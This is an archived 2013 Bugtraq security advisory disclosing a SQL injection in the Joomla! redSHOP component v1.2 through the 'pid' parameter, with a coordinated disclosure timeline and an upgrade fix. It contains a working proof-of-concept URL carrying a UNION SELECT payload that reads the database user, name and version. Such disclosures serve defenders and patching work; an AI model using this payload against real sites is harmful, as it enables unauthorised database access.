| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 8 Aug 2013 09:47:14 -0300 From: Matias Fontanini <matias.fontanini@...il.com> To: bugtraq@...urityfocus.com Subject: Joomla! redSHOP component v1.2 SQL Injection -------------------------------------------- Joomla! redSHOP component v1.2 SQL Injection -------------------------------------------- == Description == - Product: Joomla! redSHOP component - Product link: http://redcomponent.com/redcomponent/redshop - Vendor: redcomponent - Affected versions: version 1.2 is vulnerable. Other versions might be affected as well. - Vulnerability discovered by: Matias Fontanini == Vulnerability == When using the "addtocompare" task, the component does not correctly sanitize the "pid" parameter before using it to construct SQL queries, making it vulnerable to SQL Injection attacks. The following proof of concept request retrieves the database user, name and version: http://example.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422 == Solution == Upgrade the product to the 1.3 version. == Report timeline == [2013-08-02] Vulnerability reported to vendor. [2013-08-02] Developers answered back indicating that an update would be released soon. [2013-08-06] redSHOP 1.3 was released, which fixes the reported issue. [2013-08-08] Public disclosure.
Powered by blists - more mailing lists